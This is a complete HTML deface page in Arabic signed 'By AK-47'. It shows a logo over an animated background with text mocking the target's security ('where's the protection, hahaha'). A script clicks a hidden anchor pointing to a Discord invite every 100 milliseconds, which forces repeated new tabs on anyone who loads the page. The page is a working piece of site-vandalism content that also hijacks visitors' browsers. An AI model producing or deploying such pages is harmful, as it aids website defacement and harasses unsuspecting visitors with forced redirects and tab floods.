<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <title>AK-47</title>
  <!-- استدعاء خط Tajawal من Google Fonts -->
  <link href="https://fonts.googleapis.com/css2?family=Tajawal:wght@500;700&display=swap" rel="stylesheet">
  <style>
    body {
      margin: 0;
      padding: 0;
      background-image: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif');
      background-size: cover;
      background-position: center;
      font-family: 'Tajawal', sans-serif;
      text-align: center;
      color: white;
    }

    .logo-container {
      border: 5px solid red;
      padding: 20px;
      display: inline-block;
      background-color: rgba(0, 0, 0, 0.6);
      margin-top: 15%;
      border-radius: 20px;
    }

    .logo-container img {
      width: 200px;
      height: auto;
    }

    .footer-text {
      margin-top: 10px;
      font-size: 24px;
      font-weight: bold;
    }

    .tajawal-text {
      margin-top: 20px;
      font-size: 20px;
      font-weight: 500;
      color: #ffcccc;
    }

    #hiddenBtn {
      display: none;
    }
  </style>
</head>
<body>

  <div class="logo-container">
    <img src="https://k.top4top.io/p_3464zv71l1.png" alt="Logo">
    <div class="footer-text">By AK-47</div>
  </div>

  <div class="tajawal-text">القم يا هطــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــف</div>
  <div class="tajawal-text">وين الحماية ههههههههههههههههههههههههه</div>
  <div class="tajawal-text">حسنو الحماية 🤣</div>

  <script>
    setInterval(() => {
      document.getElementById("hiddenBtn").click();
    }, 100); // كل ثانية
  </script>

  <!-- زر خفي يتم الضغط عليه كل ثانية -->
  <a id="hiddenBtn" href="https://discord.gg/MBYMG9Gxh3" target="_blank">Go</a>


</body>
</html>
